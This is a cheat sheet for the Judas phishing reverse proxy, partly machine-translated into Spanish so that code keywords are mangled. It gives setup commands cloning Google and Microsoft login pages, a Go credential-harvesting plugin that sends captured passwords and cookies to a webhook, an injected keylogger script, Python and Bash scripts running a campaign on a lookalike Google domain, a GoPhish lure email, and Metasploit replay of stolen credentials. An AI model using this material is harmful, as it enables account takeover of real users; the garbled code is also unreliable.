Judas phishing Proxy hoja de trucos
Overview
Judas is a pluggable phishing proxy developed by joncooperworks that specializes in real-time website cloning through reverse proxy functionality. Unlike static phishing pages, Judas creates dynamic clones that mirror the objetivo website's behavior, including JavaScript execution, form submissions, and sesión management. This makes it particularly effective for bypassing modern security measures and creating convincing phishing campaigns.
⚠️ Warning: This tool is intended for authorized pruebas de penetración and equipo rojo exercises only. Ensure you have proper autorización before using against any objetivo.
instalación
Prerequisites
# Install Go 1.16+ and Git
sudo apt update
sudo apt install -y golang-go git build-essential
# Verify Go instalación
go version
# Set Go environment variables
expuerto GOPATH=$HOME/go
expuerto PATH=$PATH:$GOPATH/bin
expuerto GO111MODULE=on
instalación from GitHub
# Clone Judas repository
git clone https://github.com/joncooperworks/judas.git
cd judas
# Build Judas
go build -o judas cmd/judas/main.go
# Install to system path
sudo mv judas /usr/local/bin/
# Verify instalación
judas --help
Go Module instalación
# Install directly using go install
go install github.com/joncooperworks/judas/cmd/judas@latest
# Verify instalación
judas --help
Docker instalación
# Clone repository
git clone https://github.com/joncooperworks/judas.git
cd judas
# Build Docker image
docker build -t judas .
# Run Judas container
docker run -it --rm -p 8080:8080 judas --objetivo https://ejemplo.com --address 0.0.0.0:8080
# Run with SSL certificados
docker run -it --rm -p 443:443 -v $(pwd)/certs:/certs judas \
--objetivo https://ejemplo.com \
--address 0.0.0.0:443 \
--ssl-cert /certs/cert.pem \
--ssl-clave /certs/clave.pem
Manual Build
# Download source code
wget https://github.com/joncooperworks/judas/archive/main.zip
unzip main.zip
cd judas-main
# Install dependencies
go mod download
# Build binary
go build -ldbanderas="-s -w" -o judas cmd/judas/main.go
# Set permissions
chmod +x judas
Basic uso
Simple Website Cloning
# Clone a website on localhost
judas --objetivo https://ejemplo.com --address localhost:8080
# Clone with custom listening address
judas --objetivo https://login.microsoftonline.com --address 0.0.0.0:8080
# Clone with SSL termination
judas --objetivo https://accounts.google.com \
--address 0.0.0.0:443 \
--ssl-cert cert.pem \
--ssl-clave clave.pem
# Clone with custom user agent
judas --objetivo https://facebook.com \
--address localhost:8080 \
--user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
Advanced configuración
# Clone with custom headers
judas --objetivo https://ejemplo.com \
--address localhost:8080 \
--header "X-Forwarded-For: 192.168.1.100" \
--header "X-Real-IP: 192.168.1.100"
# Clone with proxy suppuerto
judas --objetivo https://ejemplo.com \
--address localhost:8080 \
--proxy http://proxy.ejemplo.com:8080
# Clone with custom timeout
judas --objetivo https://ejemplo.com \
--address localhost:8080 \
--timeout 30s
# Clone with verbose logging
judas --objetivo https://ejemplo.com \
--address localhost:8080 \
--verbose
SSL/TLS configuración
# Generate self-signed certificados
openssl req -x509 -newclave rsa:4096 -claveout clave.pem -out cert.pem -days 365 -nodes \
-subj "/C=US/ST=State/L=City/O=Organization/CN=phishing.ejemplo.com"
# Use Let's Encrypt certificados
certbot certonly --standalone -d phishing.ejemplo.com
judas --objetivo https://ejemplo.com \
--address 0.0.0.0:443 \
--ssl-cert /etc/letsencrypt/live/phishing.ejemplo.com/fullchain.pem \
--ssl-clave /etc/letsencrypt/live/phishing.ejemplo.com/privclave.pem
# Use custom CA certificados
judas --objetivo https://ejemplo.com \
--address localhost:8080 \
--ca-cert custom-ca.pem
Plugin Development
Basic Plugin Structure
// plugins/logger/logger.go
package main
impuerto (
"fmt"
"log"
"net/http"
"time"
"github.com/joncooperworks/judas/pkg/judas"
)
// LoggerPlugin logs all requests and responses
type LoggerPlugin struct \\\\{
logFile string
\\\\}
// NewLoggerPlugin creates a new logger plugin
func NewLoggerPlugin(logFile string) *LoggerPlugin \\\\{
return &LoggerPlugin;\\\\{
logFile: logFile,
\\\\}
\\\\}
// procesoRequest procesoes incoming requests
func (p *LoggerPlugin) procesoRequest(req *http.Request) error \\\\{
log.Printf("[REQUEST] %s %s from %s", req.Method, req.URL.Path, req.RemoteAddr)
// Log form data
if req.Method == "POST" \\\\{
req.ParseForm()
for clave, values := range req.PostForm \\\\{
for _, value := range values \\\\{
log.Printf("[FORM] %s: %s", clave, value)
\\\\}
\\\\}
\\\\}
return nil
\\\\}
// procesoResponse procesoes outgoing responses
func (p *LoggerPlugin) procesoResponse(resp *http.Response) error \\\\{
log.Printf("[RESPONSE] %d %s", resp.StatusCode, resp.Status)
return nil
\\\\}
// Name returns the plugin name
func (p *LoggerPlugin) Name() string \\\\{
return "Logger"
\\\\}
// Initialize sets up the plugin
func (p *LoggerPlugin) Initialize() error \\\\{
log.Printf("Logger plugin initialized with log file: %s", p.logFile)
return nil
\\\\}
// Cleanup performs plugin cleanup
func (p *LoggerPlugin) Cleanup() error \\\\{
log.Printf("Logger plugin cleanup completed")
return nil
\\\\}
// Plugin interface implementation
var Plugin LoggerPlugin
Credential Harvesting Plugin
// plugins/harvester/harvester.go
package main
impuerto (
"encoding/json"
"fmt"
"io/ioutil"
"log"
"net/http"
"os"
"time"
"github.com/joncooperworks/judas/pkg/judas"
)
// Credential represents captured credenciales
type Credential struct \\\\{
Timestamp time.Time `json:"timestamp"`
IP string `json:"ip"`
UserAgent string `json:"user_agent"`
URL string `json:"url"`
Method string `json:"method"`
FormData map[string]string `json:"form_data"`
Headers map[string]string `json:"headers"`
Cookies map[string]string `json:"cookies"`
\\\\}
// HarvesterPlugin captures and stores credenciales
type HarvesterPlugin struct \\\\{
outputFile string
webhookURL string
credenciales []Credential
\\\\}
// NewHarvesterPlugin creates a new harvester plugin
func NewHarvesterPlugin(outputFile, webhookURL string) *HarvesterPlugin \\\\{
return &HarvesterPlugin;\\\\{
outputFile: outputFile,
webhookURL: webhookURL,
credenciales: make([]Credential, 0),
\\\\}
\\\\}
// procesoRequest captures credenciales from requests
func (p *HarvesterPlugin) procesoRequest(req *http.Request) error \\\\{
// Only proceso POST requests with form data
if req.Method != "POST" \\\\{
return nil
\\\\}
// Parse form data
err := req.ParseForm()
if err != nil \\\\{
return err
\\\\}
// Check if this looks like a login form
if p.isLoginForm(req.PostForm) \\\\{
credential := Credential\\\\{
Timestamp: time.Now(),
IP: p.getClientIP(req),
UserAgent: req.UserAgent(),
URL: req.URL.String(),
Method: req.Method,
FormData: make(map[string]string),
Headers: make(map[string]string),
Cookies: make(map[string]string),
\\\\}
// Capture form data
for clave, values := range req.PostForm \\\\{
if len(values) > 0 \\\\{
credential.FormData[clave] = values[0]
\\\\}
\\\\}
// Capture relevant headers
for clave, values := range req.Header \\\\{
if len(values) > 0 && p.isRelevantHeader(clave) \\\\{
credential.Headers[clave] = values[0]
\\\\}
\\\\}
// Capture cookies
for _, cookie := range req.Cookies() \\\\{
credential.Cookies[cookie.Name] = cookie.Value
\\\\}
// Store credential
p.credenciales = append(p.credenciales, credential)
// Log capture
log.Printf("[HARVEST] Captured credenciales from %s", credential.IP)
// Save to file
p.saveCredential(credential)
// Send webhook notification
if p.webhookURL != "" \\\\{
go p.sendWebhook(credential)
\\\\}
\\\\}
return nil
\\\\}
// isLoginForm checks if the form contains login-like fields
func (p *HarvesterPlugin) isLoginForm(form map[string][]string) bool \\\\{
loginFields := []string\\\\{
"nombre de usuario", "email", "user", "login", "account",
"contraseña", "pass", "pwd", "passwd",
\\\\}
for field := range form \\\\{
for _, loginField := range loginFields \\\\{
| if field == loginField | | |
fmt.Sprintf("%s", field) == loginField \\\\{
return true
\\\\}
\\\\}
\\\\}
return false
\\\\}
// getClientIP extracts the real client IP
func (p *HarvesterPlugin) getClientIP(req *http.Request) string \\\\{
// Check X-Forwarded-For header
if xff := req.Header.Get("X-Forwarded-For"); xff != "" \\\\{
return xff
\\\\}
// Check X-Real-IP header
if xri := req.Header.Get("X-Real-IP"); xri != "" \\\\{
return xri
\\\\}
// Fall back to RemoteAddr
return req.RemoteAddr
\\\\}
// isRelevantHeader checks if a header is relevant for logging
func (p *HarvesterPlugin) isRelevantHeader(header string) bool \\\\{
relevantHeaders := []string\\\\{
"User-Agent", "Accept", "Accept-Language", "Accept-Encoding",
"Referer", "Origin", "X-Forwarded-For", "X-Real-IP",
\\\\}
for _, relevant := range relevantHeaders \\\\{
if header == relevant \\\\{
return true
\\\\}
\\\\}
return false
\\\\}
// saveCredential saves credential to file
func (p *HarvesterPlugin) saveCredential(credential Credential) \\\\{
| file, err := os.OpenFile(p.outputFile, os.O_APPEND | os.O_CREATE | os.O_WRONLY, 0644) |
if err != nil \\\\{
log.Printf("Error opening output file: %v", err)
return
\\\\}
defer file.Close()
// Write as JSON
data, err := json.Marshal(credential)
if err != nil \\\\{
log.Printf("Error marshaling credential: %v", err)
return
\\\\}
file.Write(data)
file.WriteString("\n")
\\\\}
// sendWebhook sends credential data to webhook
func (p *HarvesterPlugin) sendWebhook(credential Credential) \\\\{
// Implementation for webhook notification
// This would send the credential data to a remote endpoint
log.Printf("Sending webhook notification for credential from %s", credential.IP)
\\\\}
// procesoResponse procesoes responses (not used for harvesting)
func (p *HarvesterPlugin) procesoResponse(resp *http.Response) error \\\\{
return nil
\\\\}
// Name returns the plugin name
func (p *HarvesterPlugin) Name() string \\\\{
return "Harvester"
\\\\}
// Initialize sets up the plugin
func (p *HarvesterPlugin) Initialize() error \\\\{
log.Printf("Harvester plugin initialized with output file: %s", p.outputFile)
return nil
\\\\}
// Cleanup performs plugin cleanup
func (p *HarvesterPlugin) Cleanup() error \\\\{
log.Printf("Harvester plugin captured %d credenciales", len(p.credenciales))
return nil
\\\\}
// Plugin interface implementation
var Plugin HarvesterPlugin
Content Modification Plugin
// plugins/modifier/modifier.go
package main
impuerto (
"bytes"
"io/ioutil"
"log"
"net/http"
"regexp"
"strings"
"github.com/joncooperworks/judas/pkg/judas"
)
// ModifierPlugin modifies response content
type ModifierPlugin struct \\\\{
replacements map[string]string
injections []string
\\\\}
// NewModifierPlugin creates a new modifier plugin
func NewModifierPlugin() *ModifierPlugin \\\\{
return &ModifierPlugin;\\\\{
replacements: make(map[string]string),
injections: make([]string, 0),
\\\\}
\\\\}
// AddReplacement adds a content replacement rule
func (p *ModifierPlugin) AddReplacement(search, replace string) \\\\{
p.replacements[search] = replace
\\\\}
// AddInjection adds content to inject
func (p *ModifierPlugin) AddInjection(content string) \\\\{
p.injections = append(p.injections, content)
\\\\}
// procesoRequest procesoes requests (not used for modification)
func (p *ModifierPlugin) procesoRequest(req *http.Request) error \\\\{
return nil
\\\\}
// procesoResponse modifies response content
func (p *ModifierPlugin) procesoResponse(resp *http.Response) error \\\\{
// Only modify HTML content
contentType := resp.Header.Get("Content-Type")
if !strings.Contains(contentType, "text/html") \\\\{
return nil
\\\\}
// Read response body
body, err := ioutil.ReadAll(resp.Body)
if err != nil \\\\{
return err
\\\\}
resp.Body.Close()
// Convert to string for modification
content := string(body)
// Apply replacements
for search, replace := range p.replacements \\\\{
content = strings.ReplaceAll(content, search, replace)
\\\\}
// Inject additional content
for _, injection := range p.injections \\\\{
// Inject before closing body tag
content = strings.ReplaceAll(content, "</body>", injection+"</body>")
\\\\}
// Add clavelogger script
claveloggerScript := `
<script>
document.addEventListener('clavedown', function(e) \\{
fetch('/log-clavestroke', \\{
method: 'POST',
headers: \\{'Content-Type': 'application/json'\\},
body: JSON.stringify(\\{
clave: e.clave,
timestamp: Date.now(),
| objetivo: e.objetivo.name | | e.objetivo.id |
\\})
\\}).catch(() => \\{\\});
\\});
</script>
`
content = strings.ReplaceAll(content, "</head>", claveloggerScript+"</head>")
// Update response body
resp.Body = ioutil.NopCloser(bytes.NewReader([]byte(content)))
resp.ContentLength = int64(len(content))
resp.Header.Set("Content-Length", fmt.Sprintf("%d", len(content)))
log.Printf("[MODIFY] Modified response content (%d bytes)", len(content))
return nil
\\\\}
// Name returns the plugin name
func (p *ModifierPlugin) Name() string \\\\{
return "Modifier"
\\\\}
// Initialize sets up the plugin
func (p *ModifierPlugin) Initialize() error \\\\{
// Add default replacements
p.AddReplacement("Sign In", "Sign In (Secure)")
p.AddReplacement("Login", "Login (Verified)")
// Add tracking pixel
trackingPixel := `<img src="/track.gif" width="1" height="1" style="display:none;">`
p.AddInjection(trackingPixel)
log.Printf("Modifier plugin initialized with %d replacements and %d injections",
len(p.replacements), len(p.injections))
return nil
\\\\}
// Cleanup performs plugin cleanup
func (p *ModifierPlugin) Cleanup() error \\\\{
log.Printf("Modifier plugin cleanup completed")
return nil
\\\\}
// Plugin interface implementation
var Plugin ModifierPlugin
configuración and Deployment
configuración File
# judas.yaml
objetivo: "https://accounts.google.com"
address: "0.0.0.0:443"
ssl_cert: "/etc/ssl/certs/cert.pem"
ssl_clave: "/etc/ssl/private/clave.pem"
# Proxy settings
proxy: "http://proxy.ejemplo.com:8080"
timeout: "30s"
user_agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# Headers to add
headers:
- "X-Forwarded-For: 192.168.1.100"
- "X-Real-IP: 192.168.1.100"
# Plugins
plugins:
- name: "logger"
config:
log_file: "/var/log/judas/access.log"
- name: "harvester"
config:
output_file: "/var/log/judas/credenciales.json"
webhook_url: "https://your-server.com/webhook"
- name: "modifier"
config:
replacements:
"Sign In": "Sign In (Secure)"
"Login": "Login (Verified)"
# Logging
log_level: "info"
log_file: "/var/log/judas/judas.log"
# Security
rate_limit: 100
max_conexións: 1000
Systemd servicio
# /etc/systemd/system/judas.servicio
[Unit]
Descripción=Judas phishing Proxy
After=network.objetivo
[servicio]
Type=simple
User=judas
Group=judas
WorkingDirectory=/opt/judas
ExecStart=/usr/local/bin/judas --config /etc/judas/judas.yaml
Restart=always
RestartSec=5
# Security settings
NoNewPrivileges=true
PrivateTmp=true
ProtectSystem=strict
ProtectHome=true
ReadWritePaths=/var/log/judas
[Install]
WantedBy=multi-user.objetivo
Docker Compose
# docker-compose.yml
version: '3.8'
servicios:
judas:
build: .
puertos:
- "443:443"
- "80:80"
volumes:
- ./certs:/certs:ro
- ./logs:/logs
- ./config:/config:ro
environment:
- JUDAS_objetivo=https://accounts.google.com
- JUDAS_ADDRESS=0.0.0.0:443
- JUDAS_SSL_CERT=/certs/cert.pem
- JUDAS_SSL_clave=/certs/clave.pem
comando: >
judas
--objetivo $\\\\{JUDAS_objetivo\\\\}
--address $\\\\{JUDAS_ADDRESS\\\\}
--ssl-cert $\\\\{JUDAS_SSL_CERT\\\\}
--ssl-clave $\\\\{JUDAS_SSL_clave\\\\}
--config /config/judas.yaml
restart: unless-stopped
nginx:
image: nginx:alpine
puertos:
- "8080:80"
volumes:
- ./nginx.conf:/etc/nginx/nginx.conf:ro
depends_on:
- judas
restart: unless-stopped
Nginx Reverse Proxy
# nginx.conf
events \\\\{
worker_conexións 1024;
\\\\}
http \\\\{
upstream judas \\\\{
server judas:443;
\\\\}
server \\\\{
listen 80;
server_name phishing.ejemplo.com;
location / \\\\{
proxy_pass https://judas;
proxy_set_header host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
# SSL settings
proxy_ssl_verify off;
proxy_ssl_sesión_reuse on;
\\\\}
# Logging
access_log /var/log/nginx/judas_access.log;
error_log /var/log/nginx/judas_error.log;
\\\\}
\\\\}
Automation and Scripting
Python Automation Script
#!/usr/bin/env python3
# Judas automation script
impuerto subproceso
impuerto time
impuerto json
impuerto os
impuerto requests
impuerto hiloing
from datetime impuerto datetime
class JudasAutomation:
def __init__(self, objetivo_url, listen_address="0.0.0.0:8080"):
self.objetivo_url = objetivo_url
self.listen_address = listen_address
self.proceso = None
self.monitoring = False
self.webhook_url = "https://your-webhook-url.com/notify"
self.log_file = "judas.log"
self.credenciales_file = "credenciales.json"
def start_judas(self, ssl_cert=None, ssl_clave=None):
"""Start Judas proxy"""
cmd = [
"judas",
"--objetivo", self.objetivo_url,
"--address", self.listen_address,
"--verbose"
]
if ssl_cert and ssl_clave:
cmd.extend(["--ssl-cert", ssl_cert, "--ssl-clave", ssl_clave])
try:
self.proceso = subproceso.Popen(
cmd,
stdout=subproceso.PIPE,
stderr=subproceso.PIPE,
text=True
)
print(f"[+] Judas started with PID: \\\\{self.proceso.pid\\\\}")
print(f"[+] objetivo: \\\\{self.objetivo_url\\\\}")
print(f"[+] Listening on: \\\\{self.listen_address\\\\}")
return True
except Exception as e:
print(f"[-] Failed to start Judas: \\\\{e\\\\}")
return False
def monitor_logs(self):
"""Monitor Judas logs for activity"""
self.monitoring = True
print("[+] Starting log monitoring...")
while self.monitoring:
try:
if self.proceso and self.proceso.poll() is None:
# Read stdout
line = self.proceso.stdout.readline()
if line:
self.proceso_log_line(line.strip())
time.sleep(0.1)
except Exception as e:
print(f"[-] Log monitoring error: \\\\{e\\\\}")
time.sleep(5)
def proceso_log_line(self, line):
"""proceso individual log line"""
try:
# Log to file
with open(self.log_file, 'a') as f:
f.write(f"\\\\{datetime.now().isoformat()\\\\} - \\\\{line\\\\}\n")
# Check for credential capture
if "POST" in line and any(field in line.lower() for field in ["contraseña", "nombre de usuario", "email"]):
print(f"[+] Potential credential capture: \\\\{line\\\\}")
self.send_notification(\\\\{
'type': 'credential_capture',
'log_line': line,
'timestamp': datetime.now().isoformat()
\\\\})
# Check for new conexións
if "new conexión" in line.lower():
print(f"[+] New victim conexión: \\\\{line\\\\}")
self.send_notification(\\\\{
'type': 'new_conexión',
'log_line': line,
'timestamp': datetime.now().isoformat()
\\\\})
except Exception as e:
print(f"[-] Error procesoing log line: \\\\{e\\\\}")
def send_notification(self, data):
"""Send webhook notification"""
try:
payload = \\\\{
'text': f"🎣 Judas Activity: \\\\{data['type']\\\\}",
'data': data
\\\\}
response = requests.post(
self.webhook_url,
json=payload,
timeout=10
)
if response.status_code == 200:
print("[+] Notification sent successfully")
else:
print(f"[-] Notification failed: \\\\{response.status_code\\\\}")
except Exception as e:
print(f"[-] Notification error: \\\\{e\\\\}")
def setup_ssl_certificados(self, domain):
"""Setup SSL certificados for domain"""
try:
# Generate self-signed certificado
cmd = [
"openssl", "req", "-x509", "-newclave", "rsa:4096",
"-claveout", "clave.pem", "-out", "cert.pem",
"-days", "365", "-nodes",
"-subj", f"/C=US/ST=State/L=City/O=Organization/CN=\\\\{domain\\\\}"
]
result = subproceso.run(cmd, capture_output=True, text=True)
if result.returncode == 0:
print(f"[+] SSL certificados generated for \\\\{domain\\\\}")
return "cert.pem", "clave.pem"
else:
print(f"[-] Failed to generate SSL certificados: \\\\{result.stderr\\\\}")
return None, None
except Exception as e:
print(f"[-] SSL certificado generation error: \\\\{e\\\\}")
return None, None
def setup_ngrok_tunnel(self):
"""Setup ngrok tunnel for public access"""
try:
puerto = self.listen_address.split(':')[1]
# Start ngrok tunnel
ngrok_proceso = subproceso.Popen([
"ngrok", "http", puerto
], stdout=subproceso.PIPE, stderr=subproceso.PIPE)
time.sleep(5)
# Get public URL
response = requests.get("http://localhost:4040/api/tunnels")
if response.status_code == 200:
tunnels = response.json()['tunnels']
if tunnels:
public_url = tunnels[0]['public_url']
print(f"[+] Public URL: \\\\{public_url\\\\}")
return public_url, ngrok_proceso
except Exception as e:
print(f"[-] Failed to setup ngrok tunnel: \\\\{e\\\\}")
return None, None
def analyze_traffic(self):
"""Analyze captured traffic"""
try:
if not os.path.exists(self.log_file):
print("[-] No log file found")
return
with open(self.log_file, 'r') as f:
lines = f.readlines()
# Basic analysis
total_requests = len([line for line in lines if "HTTP" in line])
post_requests = len([line for line in lines if "POST" in line])
unique_ips = len(set([
line.split()[2] for line in lines
if len(line.split()) > 2 and "." in line.split()[2]
]))
# Generate repuerto
repuerto = \\\\{
'total_requests': total_requests,
'post_requests': post_requests,
'unique_ips': unique_ips,
'analysis_timestamp': datetime.now().isoformat()
\\\\}
# Save repuerto
with open('traffic_analysis.json', 'w') as f:
json.dump(repuerto, f, indent=2)
print(f"[+] Análisis de Tráfico complete:")
print(f" Total requests: \\\\{total_requests\\\\}")
print(f" POST requests: \\\\{post_requests\\\\}")
print(f" Unique IPs: \\\\{unique_ips\\\\}")
print(f"[+] Repuerto saved to: traffic_analysis.json")
except Exception as e:
print(f"[-] Análisis de Tráfico error: \\\\{e\\\\}")
def run_campaign(self, duration_hours=1, use_ssl=False, domain=None):
"""Run complete phishing campaign"""
print("[+] Starting Judas phishing campaign...")
ssl_cert, ssl_clave = None, None
# Setup SSL if requested
if use_ssl and domain:
ssl_cert, ssl_clave = self.setup_ssl_certificados(domain)
if ssl_cert and ssl_clave:
# Update listen address for HTTPS
self.listen_address = self.listen_address.replace(':8080', ':443')
# Setup ngrok tunnel
public_url, ngrok_proceso = self.setup_ngrok_tunnel()
# Start Judas
if not self.start_judas(ssl_cert, ssl_clave):
return False
# Start monitoring in background hilo
monitor_hilo = hiloing.hilo(objetivo=self.monitor_logs)
monitor_hilo.demonio = True
monitor_hilo.start()
# Send start notification
self.send_notification(\\\\{
'type': 'campaign_start',
'objetivo': self.objetivo_url,
'public_url': public_url,
'duration_hours': duration_hours
\\\\})
# Run for specified duration
print(f"[+] Campaign running for \\\\{duration_hours\\\\} hour(s)...")
time.sleep(duration_hours * 3600)
# Stop monitoring
self.monitoring = False
# Analyze traffic
self.analyze_traffic()
# Send completion notification
self.send_notification(\\\\{
'type': 'campaign_complete',
'objetivo': self.objetivo_url
\\\\})
# Cleanup
self.cleanup(ngrok_proceso)
print("[+] Campaign completed successfully")
return True
def cleanup(self, ngrok_proceso=None):
"""Cleanup procesoes and files"""
try:
if self.proceso and self.proceso.poll() is None:
self.proceso.terminate()
self.proceso.wait(timeout=10)
print("[+] Judas proceso terminated")
if ngrok_proceso and ngrok_proceso.poll() is None:
ngrok_proceso.terminate()
print("[+] Ngrok tunnel stopped")
# Final backup
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
if os.path.exists(self.log_file):
final_backup = f"judas_log_\\\\{timestamp\\\\}.txt"
os.rename(self.log_file, final_backup)
print(f"[+] Final log backup: \\\\{final_backup\\\\}")
except Exception as e:
print(f"[-] Cleanup error: \\\\{e\\\\}")
# uso ejemplo
def main():
# configuración
objetivo_url = "https://accounts.google.com"
listen_address = "0.0.0.0:8080"
duration_hours = 1
use_ssl = True
domain = "accounts-google-security.com"
# Create automation instance
automation = JudasAutomation(objetivo_url, listen_address)
automation.webhook_url = "https://your-webhook-url.com/notify"
# Run campaign
success = automation.run_campaign(duration_hours, use_ssl, domain)
if success:
print("[+] Campaign completed successfully")
else:
print("[-] Campaign failed")
if __name__ == "__main__":
main()
Bash Automation Script
#!/bin/bash
# Judas bash automation script
objetivo_URL="https://accounts.google.com"
LISTEN_ADDRESS="0.0.0.0:8080"
DURATION="3600" # 1 hour
USE_SSL="true"
DOMAIN="accounts-google-security.com"
# Function to start Judas
start_judas() \\\\{
echo "[+] Starting Judas proxy..."
local cmd="judas --objetivo $objetivo_URL --address $LISTEN_ADDRESS --verbose"
if [ "$USE_SSL" = "true" ]; then
# Generate SSL certificados
generate_ssl_certificados
cmd="$cmd --ssl-cert cert.pem --ssl-clave clave.pem"
fi
# Start Judas in background
$cmd > judas.log 2>&1 &
JUDAS_PID=$!
sleep 5
if kill -0 "$JUDAS_PID" 2>/dev/null; then
echo "[+] Judas started successfully (PID: $JUDAS_PID)"
return 0
else
echo "[-] Failed to start Judas"
return 1
fi
\\\\}
# Function to generate SSL certificados
generate_ssl_certificados() \\\\{
echo "[+] Generating SSL certificados for $DOMAIN..."
openssl req -x509 -newclave rsa:4096 -claveout clave.pem -out cert.pem -days 365 -nodes \
-subj "/C=US/ST=State/L=City/O=Organization/CN=$DOMAIN" 2>/dev/null
if [ $? -eq 0 ]; then
echo "[+] SSL certificados generated successfully"
else
echo "[-] Failed to generate SSL certificados"
fi
\\\\}
# Function to setup ngrok tunnel
setup_ngrok() \\\\{
echo "[+] Setting up ngrok tunnel..."
local puerto=$(echo "$LISTEN_ADDRESS"|cut -d':' -f2)
ngrok http "$puerto" > /dev/null 2>&1 &
NGROK_PID=$!
sleep 5
# Get public URL
PUBLIC_URL=$(curl -s http://localhost:4040/api/tunnels|jq -r '.tunnels[0].public_url')
if [ "$PUBLIC_URL" != "null" ] && [ -n "$PUBLIC_URL" ]; then
echo "[+] Public URL: $PUBLIC_URL"
echo "$PUBLIC_URL" > ngrok_url.txt
return 0
else
echo "[-] Failed to get ngrok URL"
return 1
fi
\\\\}
# Function to monitor logs
monitor_logs() \\\\{
echo "[+] Starting log monitoring..."
tail -f judas.log|while read line; do
echo "[LOG] $line"
# Check for credential capture
| if echo "$line" | grep -qi "POST.*contraseña\ | POST.*nombre de usuario\ | POST.*email"; then |
echo "[+] Potential credential capture detected"
send_notification "credential_capture" "$line"
fi
# Check for new conexións
if echo "$line"|grep -qi "new conexión"; then
echo "[+] New victim conexión"
send_notification "new_conexión" "$line"
fi
done &
MONITOR_PID=$!
\\\\}
# Function to send notifications
send_notification() \\\\{
local type="$1"
local data="$2"
local webhook_url="https://your-webhook-url.com/notify"
if comando -v curl &> /dev/null; then
curl -X POST -H "Content-Type: application/json" \
-d "\\\\{\"text\":\"🎣 Judas Activity: $type\", \"data\":\"$data\"\\\\}" \
"$webhook_url" 2>/dev/null
fi
\\\\}
# Function to analyze traffic
analyze_traffic() \\\\{
echo "[+] Analyzing captured traffic..."
if [ ! -f "judas.log" ]; then
echo "[-] No log file found"
return
fi
local total_requests=$(grep -c "HTTP" judas.log)
local post_requests=$(grep -c "POST" judas.log)
| local unique_ips=$(grep -oP '\d+\.\d+\.\d+\.\d+' judas.log | sort -u | wc -l) |
echo "[+] Análisis de Tráfico results:"
echo " Total requests: $total_requests"
echo " POST requests: $post_requests"
echo " Unique IPs: $unique_ips"
# Save analysis to file
cat > traffic_analysis.txt << EOF
Análisis de Tráfico Repuerto
Generated: $(date)
objetivo: $objetivo_URL
Duration: $DURATION seconds
Total requests: $total_requests
POST requests: $post_requests
Unique IPs: $unique_ips
EOF
echo "[+] Analysis saved to: traffic_analysis.txt"
\\\\}
# Function to cleanup
cleanup() \\\\{
echo "[+] Cleaning up..."
if [ -n "$JUDAS_PID" ]; then
kill "$JUDAS_PID" 2>/dev/null
echo "[+] Judas stopped"
fi
if [ -n "$NGROK_PID" ]; then
kill "$NGROK_PID" 2>/dev/null
echo "[+] Ngrok tunnel stopped"
fi
if [ -n "$MONITOR_PID" ]; then
kill "$MONITOR_PID" 2>/dev/null
echo "[+] Log monitoring stopped"
fi
# Final backup
if [ -f "judas.log" ]; then
local timestamp=$(date +"%Y%m%d_%H%M%S")
cp judas.log "judas_log_$timestamp.txt"
echo "[+] Final log backup: judas_log_$timestamp.txt"
fi
exit 0
\\\\}
# Set trap for cleanup
trap cleanup SIGINT SIGTERM
# Main execution
main() \\\\{
echo "[+] Judas Automation Script"
echo "[+] objetivo: $objetivo_URL"
echo "[+] Listen Address: $LISTEN_ADDRESS"
echo "[+] Duration: $DURATION seconds"
echo "[+] SSL: $USE_SSL"
# Check dependencies
for cmd in judas openssl curl jq; do
if ! comando -v "$cmd" &> /dev/null; then
echo "[-] Required comando not found: $cmd"
exit 1
fi
done
# Setup ngrok tunnel
if setup_ngrok; then
# Start Judas
if start_judas; then
# Start log monitoring
monitor_logs
# Send start notification
send_notification "campaign_start" "objetivo: $objetivo_URL, Duration: $DURATION seconds"
# Run for specified duration
echo "[+] Campaign running for $DURATION seconds..."
sleep "$DURATION"
# Analyze traffic
analyze_traffic
# Send completion notification
send_notification "campaign_complete" "objetivo: $objetivo_URL"
fi
fi
cleanup
\\\\}
# Execute main function
main
Integration with Other Tools
GoPhish Integration
# Integrate Judas with GoPhish for email delivery
impuerto requests
impuerto json
class GoPhishJudasIntegration:
def __init__(self, gophish_url, gophish_api_clave, judas_url):
self.gophish_url = gophish_url
self.gophish_api_clave = gophish_api_clave
self.judas_url = judas_url
self.headers = \\\\{
'autorización': f'Bearer \\\\{gophish_api_clave\\\\}',
'Content-Type': 'application/json'
\\\\}
def create_gophish_campaign(self):
"""Create GoPhish campaign with Judas URL"""
campaign_data = \\\\{
"name": "Judas Proxy Campaign",
"template": \\\\{
"name": "Account Security Alert",
"subject": "Immediate Action Required: Verify Your Account",
"html": f"""
<html>
<body>
<h2>Security Alert</h2>
<p>We've detected unusual activity on your account that requires immediate attention.</p>
<p>Please verify your identity to secure your account:</p>
<p><a href="\\\\{self.judas_url\\\\}" style="background-color: #1a73e8; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px;">Verify Account Now</a></p>
<p>This verification link will expire in 24 hours.</p>
<p>If you did not request this verification, please contact suppuerto immediately.</p>
</body>
</html>
""",
"text": f"Please verify your account by visiting: \\\\{self.judas_url\\\\}"
\\\\},
"page": \\\\{
"name": "Judas Redirect",
"html": f'<script>window.location.href="\\\\{self.judas_url\\\\}";</script>',
"redirect_url": self.judas_url
\\\\}
\\\\}
response = requests.post(
f"\\\\{self.gophish_url\\\\}/api/campaigns",
headers=self.headers,
json=campaign_data
)
return response.json()
# uso
integration = GoPhishJudasIntegration(
"http://localhost:3333",
"your_gophish_api_clave",
"https://your-judas-proxy.com"
)
campaign = integration.create_gophish_campaign()
Metasploit Integration
# Use Judas for credential harvesting, then pivot to Metasploit
# After capturing credenciales through Judas, use them in Metasploit
# ejemplo: Use captured credenciales for further exploitation
use auxiliary/scanner/http/http_login
set RhostS objetivo-server.com
set nombre de usuario captured_nombre de usuario
set contraseña captured_contraseña
run
# Use captured sesión cookies
use auxiliary/scanner/http/cookie_replay
set COOKIE "captured_sesión_cookie"
set RhostS objetivo.com
run
EvilGinx2 Integration
# Combine Judas with EvilGinx2 for advanced phishing
# Use Judas for initial website cloning
# Use EvilGinx2 for 2FA bypass and sesión management
# Start Judas for website cloning
judas --objetivo https://accounts.google.com --address localhost:8080
# Configure EvilGinx2 to use Judas as upstream
# This allows combining real-time cloning with 2FA bypass
Operational Security
Infrastructure Security
